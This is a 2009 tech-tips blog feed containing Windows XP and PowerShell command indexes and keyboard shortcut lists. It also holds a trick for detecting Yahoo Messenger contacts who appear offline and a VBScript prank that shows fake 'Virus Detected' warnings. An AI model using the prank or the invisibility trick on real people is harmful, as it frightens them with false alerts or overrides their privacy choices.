/&gt;Get-Variable gv Get a powershell variable&lt;br /&gt;New-Variable nv Create a new variable&lt;br /&gt;Remove-Variable rv Remove a variable and its value&lt;br /&gt;Set-Variable set/sv Set a variable and a value&lt;br /&gt;w&lt;br /&gt;Where-Object where Filter input from the pipeline&lt;br /&gt;While (condition) {action} else {action} &lt;br /&gt;Get-WMIobject Get WMI class information&lt;br /&gt;Write-Debug Write a debug message to the host display&lt;br /&gt;Write-Error Write an object to the error pipeline.&lt;br /&gt;Write-Output echo Write an object to the pipeline&lt;br /&gt;Write-Progress Display a progress bar&lt;br /&gt;Write-Verbose Write a string to the host's verbose display&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-7934841955433389686?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/7934841955433389686/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/12/a-z-index-of-windows-powershell.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/7934841955433389686'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/7934841955433389686'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/12/a-z-index-of-windows-powershell.html' title='An A-Z Index of Windows PowerShell commands'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-2476572774606954060</id><published>2009-12-20T06:37:00.000-08:00</published><updated>2009-12-20T06:37:08.195-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><category scheme='http://www.blogger.com/atom/ns#' term='Run'/><category scheme='http://www.blogger.com/atom/ns#' term='shortcut'/><title type='text'>An A-Z Index of the Windows XP command line</title><content type='html'>ADDUSERS Add or list users to/from a CSV file&lt;br /&gt;ARP Address Resolution Protocol&lt;br /&gt;~ ASSOC Change file extension associations&lt;br /&gt;ASSOCIAT One step file association&lt;br /&gt;AT Schedule a command to run at a later time&lt;br /&gt;ATTRIB Change file attributes&lt;br /&gt;b&lt;br /&gt;BOOTCFG Edit Windows boot settings&lt;br /&gt;BROWSTAT Get domain, browser and PDC info&lt;br /&gt;c&lt;br /&gt;CACLS Change file permissions&lt;br /&gt;~ CALL Call one batch program from another&lt;br /&gt;~ CD Change Directory - move to a specific Folder&lt;br /&gt;CHANGE Change Terminal Server Session properties&lt;br /&gt;CHKDSK Check Disk - check and repair disk problems&lt;br /&gt;CHKNTFS Check the NTFS file system&lt;br /&gt;CHOICE Accept keyboard input to a batch file&lt;br /&gt;CIPHER Encrypt or Decrypt files/folders&lt;br /&gt;CleanMgr Automated cleanup of Temp files, recycle bin&lt;br /&gt;CLEARMEM Clear memory leaks&lt;br /&gt;CLIP Copy STDIN to the Windows clipboard.&lt;br /&gt;~ CLS Clear the screen&lt;br /&gt;CLUSTER Windows Clustering&lt;br /&gt;CMD Start a new CMD shell&lt;br /&gt;~ COLOR Change colors of the CMD window&lt;br /&gt;COMP Compare the contents of two files or sets of files&lt;br /&gt;COMPACT Compress files or folders on an NTFS partition&lt;br /&gt;COMPRESS Compress individual files on an NTFS partition&lt;br /&gt;CON2PRT Connect or disconnect a Printer&lt;br /&gt;CONVERT Convert a FAT drive to NTFS.&lt;br /&gt;~ COPY Copy one or more files to another location&lt;br /&gt;CSCcmd Client-side caching (Offline Files)&lt;br /&gt;CSVDE Import or Export Active Directory data &lt;br /&gt;d&lt;br /&gt;~ DATE Display or set the date&lt;br /&gt;Dcomcnfg DCOM Configuration Utility&lt;br /&gt;DEFRAG Defragment hard drive&lt;br /&gt;~ DEL Delete one or more files&lt;br /&gt;DELPROF Delete NT user profiles&lt;br /&gt;DELTREE Delete a folder and all subfolders&lt;br /&gt;DevCon Device Manager Command Line Utility &lt;br /&gt;~ DIR Display a list of files and folders&lt;br /&gt;DIRUSE Display disk usage&lt;br /&gt;DISKCOMP Compare the contents of two floppy disks&lt;br /&gt;DISKCOPY Copy the contents of one floppy disk to another&lt;br /&gt;DISKPART Disk Administration&lt;br /&gt;DNSSTAT DNS Statistics&lt;br /&gt;DOSKEY Edit command line, recall commands, and create macros&lt;br /&gt;DSADD Add user (computer, group..) to active directory&lt;br /&gt;DSQUERY List items in active directory&lt;br /&gt;DSMOD Modify user (computer, group..) in active directory&lt;br /&gt;e&lt;br /&gt;~ ECHO Display message on screen&lt;br /&gt;~ ENDLOCAL End localisation of environment changes in a batch file&lt;br /&gt;~ ERASE Delete one or more files&lt;br /&gt;~ EXIT Quit the current script/routine and set an errorlevel.&lt;br /&gt;EXPAND Uncompress files&lt;br /&gt;EXTRACT Uncompress CAB files&lt;br /&gt;f&lt;br /&gt;FC Compare two files&lt;br /&gt;FIND Search for a text string in a file&lt;br /&gt;FINDSTR Search for strings in files&lt;br /&gt;~ FOR /F Loop command: against a set of files&lt;br /&gt;~ FOR /F Loop command: against the results of another command&lt;br /&gt;~ FOR Loop command: all options Files, Directory, List&lt;br /&gt;FORFILES Batch process multiple files&lt;br /&gt;FORMAT Format a disk&lt;br /&gt;FREEDISK Check free disk space (in bytes)&lt;br /&gt;FSUTIL File and Volume utilities&lt;br /&gt;FTP File Transfer Protocol&lt;br /&gt;~ FTYPE Display or modify file types used in file extension associations&lt;br /&gt;g&lt;br /&gt;GLOBAL Display membership of global groups&lt;br /&gt;~ GOTO Direct a batch program to jump to a labelled line&lt;br /&gt;h&lt;br /&gt;HELP Online Help&lt;br /&gt;i&lt;br /&gt;~ IF Conditionally perform a command&lt;br /&gt;IFMEMBER Is the current user in an NT Workgroup&lt;br /&gt;IPCONFIG Configure IP&lt;br /&gt;k&lt;br /&gt;KILL Remove a program from memory&lt;br /&gt;l&lt;br /&gt;LABEL Edit a disk label&lt;br /&gt;LOCAL Display membership of local groups&lt;br /&gt;LOGEVENT Write text to the NT event viewer.&lt;br /&gt;LOGOFF Log a user off&lt;br /&gt;LOGTIME Log the date and time in a file&lt;br /&gt;m&lt;br /&gt;MAPISEND Send email from the command line&lt;br /&gt;MBSAcli Baseline Security Analyzer. &lt;br /&gt;MEM Display memory usage&lt;br /&gt;~ MD Create new folders&lt;br /&gt;MKLINK Create a symbolic link (linkd)&lt;br /&gt;MODE Configure a system device&lt;br /&gt;MORE Display output, one screen at a time&lt;br /&gt;MOUNTVOL Manage a volume mount point&lt;br /&gt;~ MOVE Move files from one folder to another&lt;br /&gt;MOVEUSER Move a user from one domain to another&lt;br /&gt;MSG Send a message&lt;br /&gt;MSIEXEC Microsoft Windows Installer&lt;br /&gt;MSINFO Windows NT diagnostics&lt;br /&gt;MSTSC Terminal Server Connection (Remote Desktop Protocol)&lt;br /&gt;MUNGE Find and Replace text within file(s)&lt;br /&gt;MV Copy in-use files&lt;br /&gt;n&lt;br /&gt;NET Manage network resources&lt;br /&gt;NETDOM Domain Manager&lt;br /&gt;NETSH Configure network protocols&lt;br /&gt;NETSVC Command-line Service Controller&lt;br /&gt;NBTSTAT Display networking statistics (NetBIOS over TCP/IP)&lt;br /&gt;NETSTAT Display networking statistics (TCP/IP)&lt;br /&gt;NOW Display the current Date and Time &lt;br /&gt;NSLOOKUP Name server lookup&lt;br /&gt;NTBACKUP Backup folders to tape&lt;br /&gt;NTRIGHTS Edit user account rights&lt;br /&gt;p&lt;br /&gt;~ PATH Display or set a search path for executable files&lt;br /&gt;PATHPING Trace route plus network latency and packet loss&lt;br /&gt;~ PAUSE Suspend processing of a batch file and display a message&lt;br /&gt;PERMS Show permissions for a user&lt;br /&gt;PERFMON Performance Monitor&lt;br /&gt;PING Test a network connection&lt;br /&gt;~ POPD Restore the previous value of the current directory saved by PUSHD&lt;br /&gt;PORTQRY Display the status of ports and services&lt;br /&gt;PRINT Print a text file&lt;br /&gt;PRNCNFG Display, configure or rename a printer&lt;br /&gt;PRNMNGR Add, delete, list printers set the default printer&lt;br /&gt;~ PROMPT Change the command prompt&lt;br /&gt;PsExec Execute process remotely&lt;br /&gt;PsFile Show files opened remotely&lt;br /&gt;PsGetSid Display the SID of a computer or a user&lt;br /&gt;PsInfo List information about a system&lt;br /&gt;PsKill Kill processes by name or process ID&lt;br /&gt;PsList List detailed information about processes&lt;br /&gt;PsLoggedOn Who's logged on (locally or via resource sharing)&lt;br /&gt;PsLogList Event log records&lt;br /&gt;PsPasswd Change account password&lt;br /&gt;PsService View and control services&lt;br /&gt;PsShutdown Shutdown or reboot a computer&lt;br /&gt;PsSuspend Suspend processes&lt;br /&gt;~ PUSHD Save and then change the current directory&lt;br /&gt;q&lt;br /&gt;QGREP Search file(s) for lines that match a given pattern.&lt;br /&gt;r&lt;br /&gt;RASDIAL Manage RAS connections&lt;br /&gt;RASPHONE Manage RAS connections&lt;br /&gt;RECOVER Recover a damaged file from a defective disk.&lt;br /&gt;REG Registry: Read, Set, Export, Delete keys and values&lt;br /&gt;REGEDIT Import or export registry settings&lt;br /&gt;REGSVR32 Register or unregister a DLL&lt;br /&gt;REGINI Change Registry Permissions&lt;br /&gt;~ REM Record comments (remarks) in a batch file&lt;br /&gt;~ REN Rename a file or files.&lt;br /&gt;REPLACE Replace or update one file with another&lt;br /&gt;~ RD Delete folder(s)&lt;br /&gt;RMTSHARE Share a folder or a printer&lt;br /&gt;ROBOCOPY Robust File and Folder Copy&lt;br /&gt;ROUTE Manipulate network routing tables&lt;br /&gt;RUNAS Execute a program under a different user account&lt;br /&gt;RUNDLL32 Run a DLL command (add/remove print connections)&lt;br /&gt;s&lt;br /&gt;SC Service Control&lt;br /&gt;SCHTASKS Create or Edit Scheduled Tasks &lt;br /&gt;SCLIST Display NT Services&lt;br /&gt;~ SET Display, set, or remove environment variables&lt;br /&gt;~ SETLOCAL Control the visibility of environment variables&lt;br /&gt;SETX Set environment variables permanently &lt;br /&gt;SHARE List or edit a file share or print share&lt;br /&gt;~ SHIFT Shift the position of replaceable parameters in a batch file&lt;br /&gt;SHORTCUT Create a windows shortcut (.LNK file)&lt;br /&gt;SHOWGRPS List the NT Workgroups a user has joined&lt;br /&gt;SHOWMBRS List the Users who are members of a Workgroup&lt;br /&gt;SHUTDOWN Shutdown the computer&lt;br /&gt;SLEEP Wait for x seconds&lt;br /&gt;SOON Schedule a command to run in the near future&lt;br /&gt;SORT Sort input&lt;br /&gt;~ START Start a program or command in a separate window.&lt;br /&gt;SU Switch User&lt;br /&gt;SUBINACL Edit file and folder Permissions, Ownership and Domain&lt;br /&gt;SUBST Associate a path with a drive letter&lt;br /&gt;SYSTEMINFO List system configuration&lt;br /&gt;t&lt;br /&gt;TASKLIST List running applications and services&lt;br /&gt;TASKKILL Remove a running process from memory&lt;br /&gt;~ TIME Display or set the system time&lt;br /&gt;TIMEOUT Delay processing of a batch file&lt;br /&gt;~ TITLE Set the window title for a CMD.EXE session&lt;br /&gt;TLIST Task list with full path&lt;br /&gt;TOUCH Change file timestamps &lt;br /&gt;TRACERT Trace route to a remote host&lt;br /&gt;TREE Graphical display of folder structure&lt;br /&gt;~ TYPE Display the contents of a text file&lt;br /&gt;u&lt;br /&gt;USRSTAT List domain usernames and last login&lt;br /&gt;v&lt;br /&gt;~ VER Display version information&lt;br /&gt;~ VERIFY Verify that files have been saved&lt;br /&gt;~ VOL Display a disk label&lt;br /&gt;w&lt;br /&gt;WHERE Locate and display files in a directory tree&lt;br /&gt;WHOAMI Output the current UserName and domain&lt;br /&gt;WINDIFF Compare the contents of two files or sets of files&lt;br /&gt;WINMSD Windows system diagnostics&lt;br /&gt;WINMSDP Windows system diagnostics II&lt;br /&gt;WMIC WMI Commands&lt;br /&gt;x&lt;br /&gt;XCACLS Change file permissions&lt;br /&gt;XCOPY Copy files and folders&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-2476572774606954060?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/2476572774606954060/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/12/a-z-index-of-windows-xp-command-line.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/2476572774606954060'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/2476572774606954060'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/12/a-z-index-of-windows-xp-command-line.html' title='An A-Z Index of the Windows XP command line'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-7924072464990894777</id><published>2009-12-20T06:35:00.000-08:00</published><updated>2009-12-20T06:35:34.073-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><category scheme='http://www.blogger.com/atom/ns#' term='speedup'/><category scheme='http://www.blogger.com/atom/ns#' term='shortcut'/><title type='text'>All Window Shortcut Keys</title><content type='html'>---------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Getting used to using your keyboard exclusively and leaving your mouse behind will make you much more efficient at performing any task on any Windows system. I use the following keyboard shortcuts every day:&lt;br /&gt;&lt;br /&gt;Windows key + R = Run menu&lt;br /&gt;&lt;br /&gt;This is usually followed by:&lt;br /&gt;cmd = Command Prompt&lt;br /&gt;iexplore + "web address" = Internet Explorer&lt;br /&gt;compmgmt.msc = Computer Management&lt;br /&gt;dhcpmgmt.msc = DHCP Management&lt;br /&gt;dnsmgmt.msc = DNS Management&lt;br /&gt;services.msc = Services&lt;br /&gt;eventvwr = Event Viewer&lt;br /&gt;dsa.msc = Active Directory Users and Computers&lt;br /&gt;dssite.msc = Active Directory Sites and Services&lt;br /&gt;Windows key + E = Explorer&lt;br /&gt;&lt;br /&gt;ALT + Tab = Switch between windows&lt;br /&gt;&lt;br /&gt;ALT, Space, X = Maximize window&lt;br /&gt;&lt;br /&gt;CTRL + Shift + Esc = Task Manager&lt;br /&gt;&lt;br /&gt;Windows key + Break = System properties&lt;br /&gt;&lt;br /&gt;Windows key + F = Search&lt;br /&gt;&lt;br /&gt;Windows key + D = Hide/Display all windows&lt;br /&gt;&lt;br /&gt;CTRL + C = copy&lt;br /&gt;&lt;br /&gt;CTRL + X = cut&lt;br /&gt;&lt;br /&gt;CTRL + V = paste&lt;br /&gt;&lt;br /&gt;Also don't forget about the "Right-click" key next to the right Windows key on your keyboard. Using the arrows and that key can get just about anything done once you've opened up any program.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Keyboard Shortcuts&lt;br /&gt;&lt;br /&gt;[Alt]and [Esc] Switch between running applications&lt;br /&gt;&lt;br /&gt;[Alt] and letter Select menu item by underlined letter&lt;br /&gt;&lt;br /&gt;[Ctrl] and [Esc] Open Program Menu&lt;br /&gt;&lt;br /&gt;[Ctrl] and [F4] Close active document or group windows (does not work with some applications)&lt;br /&gt;&lt;br /&gt;[Alt] and [F4] Quit active application or close current window&lt;br /&gt;&lt;br /&gt;[Alt] and [-] Open Control menu for active document&lt;br /&gt;&lt;br /&gt;Ctrl] Lft., Rt. arrow Move cursor forward or back one word&lt;br /&gt;&lt;br /&gt;Ctrl] Up, Down arrow Move cursor forward or back one paragraph&lt;br /&gt;&lt;br /&gt;[F1] Open Help for active application&lt;br /&gt;&lt;br /&gt;Windows+M Minimize all open windows&lt;br /&gt;&lt;br /&gt;Shift+Windows+M Undo minimize all open windows&lt;br /&gt;&lt;br /&gt;Windows+F1 Open Windows Help&lt;br /&gt;&lt;br /&gt;Windows+Tab Cycle through the Taskbar buttons&lt;br /&gt;&lt;br /&gt;Windows+Break Open the System Properties dialog box&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Acessability shortcuts&lt;br /&gt;&lt;br /&gt;Right SHIFT for eight seconds........ Switch FilterKeys on and off.&lt;br /&gt;&lt;br /&gt;Left ALT +left SHIFT +PRINT SCREEN....... Switch High Contrast on and off.&lt;br /&gt;&lt;br /&gt;Left ALT +left SHIFT +NUM LOCK....... Switch MouseKeys on and off.&lt;br /&gt;&lt;br /&gt;SHIFT....... five times Switch StickyKeys on and off.&lt;br /&gt;&lt;br /&gt;NUM LOCK...... for five seconds Switch ToggleKeys on and off.&lt;br /&gt;&lt;br /&gt;Explorer shortcuts&lt;br /&gt;&lt;br /&gt;END....... Display the bottom of the active window.&lt;br /&gt;&lt;br /&gt;HOME....... Display the top of the active window.&lt;br /&gt;&lt;br /&gt;NUM LOCK+ASTERISK....... on numeric keypad (*) Display all subfolders under the selected folder.&lt;br /&gt;&lt;br /&gt;NUM LOCK+PLUS SIGN....... on numeric keypad (+) Display the contents of the selected folder.&lt;br /&gt;&lt;br /&gt;NUM LOCK+MINUS SIGN....... on numeric keypad (-) Collapse the selected folder.&lt;br /&gt;&lt;br /&gt;LEFT ARROW...... Collapse current selection if it's expanded, or select parent folder.&lt;br /&gt;&lt;br /&gt;RIGHT ARROW....... Display current selection if it's collapsed, or select first subfolder.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Type the following commands in your Run Box (Windows Key + R) or Start Run&lt;br /&gt;&lt;br /&gt;devmgmt.msc = Device Manager&lt;br /&gt;msinfo32 = System Information&lt;br /&gt;cleanmgr = Disk Cleanup&lt;br /&gt;ntbackup = Backup or Restore Wizard (Windows Backup Utility)&lt;br /&gt;mmc = M*cro$oft Management Console&lt;br /&gt;excel = M*cro$oft Excel (If Installed)&lt;br /&gt;msaccess = M*cro$oft Access (If Installed)&lt;br /&gt;powerpnt = M*cro$oft PowerPoint (If Installed)&lt;br /&gt;winword = M*cro$oft Word (If Installed)&lt;br /&gt;frontpg = M*cro$oft FrontPage (If Installed)&lt;br /&gt;notepad = Notepad&lt;br /&gt;wordpad = WordPad&lt;br /&gt;calc = Calculator&lt;br /&gt;msmsgs = Windows Messenger&lt;br /&gt;mspaint = M*cro$oft Paint&lt;br /&gt;wmplayer = Windows Media Player&lt;br /&gt;rstrui = System Restore&lt;br /&gt;netscp6 = Netscape 6.x&lt;br /&gt;netscp = Netscape 7.x&lt;br /&gt;netscape = Netscape 4.x&lt;br /&gt;waol = America Online&lt;br /&gt;control = Opens the Control Panel&lt;br /&gt;control printers = Opens the Printers Dialog&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Internetbrowser&lt;br /&gt;&lt;br /&gt;type in u're adress "google", then press [Right CTRL] and [Enter]&lt;br /&gt;add www. and .com to word and go to it&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;For Windows XP:&lt;br /&gt;&lt;br /&gt;Copy. CTRL+C&lt;br /&gt;Cut. CTRL+X&lt;br /&gt;Paste. CTRL+V&lt;br /&gt;Undo. CTRL+Z&lt;br /&gt;Delete. DELETE&lt;br /&gt;Delete selected item permanently without placing the item in the Recycle Bin. SHIFT+DELETE&lt;br /&gt;Copy selected item. CTRL while dragging an item&lt;br /&gt;Create shortcut to selected item. CTRL+SHIFT while dragging an item&lt;br /&gt;Rename selected item. F2&lt;br /&gt;Move the insertion point to the beginning of the next word. CTRL+RIGHT ARROW&lt;br /&gt;Move the insertion point to the beginning of the previous word. CTRL+LEFT ARROW&lt;br /&gt;Move the insertion point to the beginning of the next paragraph. CTRL+DOWN ARROW&lt;br /&gt;Move the insertion point to the beginning of the previous paragraph. CTRL+UP ARROW&lt;br /&gt;Highlight a block of text. CTRL+SHIFT with any of the arrow keys&lt;br /&gt;Select more than one item in a window or on the desktop, or select text within a document. SHIFT with any of the arrow keys&lt;br /&gt;Select all. CTRL+A&lt;br /&gt;Search for a file or folder. F3&lt;br /&gt;View properties for the selected item. ALT+ENTER&lt;br /&gt;Close the active item, or quit the active program. ALT+F4&lt;br /&gt;Opens the shortcut menu for the active window. ALT+SPACEBAR&lt;br /&gt;Close the active document in programs that allow you to have multiple documents open simultaneously. CTRL+F4&lt;br /&gt;Switch between open items. ALT+TAB&lt;br /&gt;Cycle through items in the order they were opened. ALT+ESC&lt;br /&gt;Cycle through screen elements in a window or on the desktop. F6&lt;br /&gt;Display the Address bar list in My Computer or Windows Explorer. F4&lt;br /&gt;Display the shortcut menu for the selected item. SHIFT+F10&lt;br /&gt;Display the System menu for the active window. ALT+SPACEBAR&lt;br /&gt;Display the Start menu. CTRL+ESC&lt;br /&gt;Display the corresponding menu. ALT+Underlined letter in a menu name&lt;br /&gt;Carry out the corresponding command. Underlined letter in a command name on an open menu&lt;br /&gt;Activate the menu bar in the active program. F10&lt;br /&gt;Open the next menu to the right, or open a submenu. RIGHT ARROW&lt;br /&gt;Open the next menu to the left, or close a submenu. LEFT ARROW&lt;br /&gt;Refresh the active window. F5&lt;br /&gt;View the folder one level up in My Computer or Windows Explorer. BACKSPACE&lt;br /&gt;Cancel the current task. ESC&lt;br /&gt;SHIFT when you insert a CD into the CD-ROM drive Prevent the CD from automatically playing.&lt;br /&gt;&lt;br /&gt;Use these keyboard shortcuts for dialog boxes:&lt;br /&gt;&lt;br /&gt;To Press&lt;br /&gt;Move forward through tabs. CTRL+TAB&lt;br /&gt;Move backward through tabs. CTRL+SHIFT+TAB&lt;br /&gt;Move forward through options. TAB&lt;br /&gt;Move backward through options. SHIFT+TAB&lt;br /&gt;Carry out the corresponding command or select the corresponding option. ALT+Underlined letter&lt;br /&gt;Carry out the command for the active option or button. ENTER&lt;br /&gt;Select or clear the check box if the active option is a check box. SPACEBAR&lt;br /&gt;Select a button if the active option is a group of option buttons. Arrow keys&lt;br /&gt;Display Help. F1&lt;br /&gt;Display the items in the active list. F4&lt;br /&gt;Open a folder one level up if a folder is selected in the Save As or Open dialog box. BACKSPACE&lt;br /&gt;&lt;br /&gt;If you have a M*cro$oft Natural Keyboard, or any other compatible keyboard that includes the Windows logo key and the Application key , you can use these keyboard shortcuts:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Display or hide the Start menu. WIN Key&lt;br /&gt;Display the System Properties dialog box. WIN Key+BREAK&lt;br /&gt;Show the desktop. WIN Key+D&lt;br /&gt;Minimize all windows. WIN Key+M&lt;br /&gt;Restores minimized windows. WIN Key+Shift+M&lt;br /&gt;Open My Computer. WIN Key+E&lt;br /&gt;Search for a file or folder. WIN Key+F&lt;br /&gt;Search for computers. CTRL+WIN Key+F&lt;br /&gt;Display Windows Help. WIN Key+F1&lt;br /&gt;Lock your computer if you are connected to a network domain, or switch users if you are not connected to a network domain. WIN Key+ L&lt;br /&gt;Open the Run dialog box. WIN Key+R&lt;br /&gt;Open Utility Manager. WIN Key+U&lt;br /&gt;&lt;br /&gt;accessibility keyboard shortcuts:&lt;br /&gt;&lt;br /&gt;Switch FilterKeys on and off. Right SHIFT for eight seconds&lt;br /&gt;Switch High Contrast on and off. Left ALT+left SHIFT+PRINT SCREEN&lt;br /&gt;Switch MouseKeys on and off. Left ALT +left SHIFT +NUM LOCK&lt;br /&gt;Switch StickyKeys on and off. SHIFT five times&lt;br /&gt;Switch ToggleKeys on and off. NUM LOCK for five seconds&lt;br /&gt;Open Utility Manager. WIN Key+U&lt;br /&gt;&lt;br /&gt;shortcuts you can use with Windows Explorer:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Display the bottom of the active window. END&lt;br /&gt;Display the top of the active window. HOME&lt;br /&gt;Display all subfolders under the selected folder. NUM LOCK+ASTERISK on numeric keypad (*)&lt;br /&gt;Display the contents of the selected folder. NUM LOCK+PLUS SIGN on numeric keypad (+)&lt;br /&gt;Collapse the selected folder. NUM LOCK+MINUS SIGN on numeric keypad (-)&lt;br /&gt;Collapse current selection if it's expanded, or select parent folder. LEFT ARROW&lt;br /&gt;Display current selection if it's collapsed, or select first subfolder. RIGHT ARROW&lt;br /&gt;&lt;br /&gt;---------------------------------------------------------------------------&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-7924072464990894777?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/7924072464990894777/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/12/all-window-shortcut-keys.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/7924072464990894777'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/7924072464990894777'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/12/all-window-shortcut-keys.html' title='All Window Shortcut Keys'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-7323378157958566620</id><published>2009-11-29T07:00:00.003-08:00</published><updated>2009-11-29T07:00:48.312-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Other'/><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><category scheme='http://www.blogger.com/atom/ns#' term='hack'/><title type='text'>Find who is Invisible on Yahoo Messenger</title><content type='html'>Sometimes some of your friends who appear offline in Yahoo Messenger may not be actually offline, they may in the 'Invisible' mode. This maybe if they are trying to ignore you or are too busy to talk to anyone.&lt;br /&gt;&lt;br /&gt;There is a small trick that you can use to find out what the truth is&lt;br /&gt;&lt;br /&gt;Firstly open your Yahoo Messenger main window and double click on the name of the person whom you want to check. The chat window will open obviously.&lt;br /&gt;&lt;br /&gt;Click IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle.&lt;br /&gt;&lt;br /&gt;After loading the Doodle Imvironment there can be two possibilities :-&lt;br /&gt;&lt;br /&gt;## 1. If the user is offline Doodle are will show this "waiting for your friend to load Doodle" continuously.&lt;br /&gt;&lt;br /&gt;## 2. If the user is online (but in invisible mode), after few seconds (it can take up to one minute, depending on your connection speed), you should get a blank page. So you know that the user is online.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-7323378157958566620?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/7323378157958566620/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/find-who-is-invisible-on-yahoo.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/7323378157958566620'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/7323378157958566620'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/find-who-is-invisible-on-yahoo.html' title='Find who is Invisible on Yahoo Messenger'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-1154157241048521573</id><published>2009-11-29T07:00:00.001-08:00</published><updated>2009-11-29T07:00:06.614-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Other'/><category scheme='http://www.blogger.com/atom/ns#' term='Fun'/><title type='text'>How To Make A Scary Pop-up</title><content type='html'>You can use this trick to scare your friends or to make something useful, like reminders you put in Windows Start-up.&lt;br /&gt;&lt;br /&gt;Here are the steps on how to do a pop-up:&lt;br /&gt;&lt;br /&gt;1. Open Notepad and type:&lt;br /&gt;&lt;br /&gt;text1=msgbox("your text here",52,"your title here")&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;You can write as many text message boxes as you want. The many you write the many pop-ups will appear.&lt;br /&gt;&lt;br /&gt;2. Save the text as popup.vbs. Be sure the change the 'Save as Type' to 'All Files' .&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3. You can use scary messages to make a prank to your friends, like:&lt;br /&gt;&lt;br /&gt;text1=msgbox("Virus Detected",52,"Warning: VIRUS")&lt;br /&gt;text2=msgbox("Virus is installing on your system",52,"Installing...")&lt;br /&gt;text3=msgbox("Virus is installing on your system",52,"Installing...")&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-1154157241048521573?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/1154157241048521573/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/how-to-make-scary-pop-up.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/1154157241048521573'/><link rel='self' type='application/atom+xml' 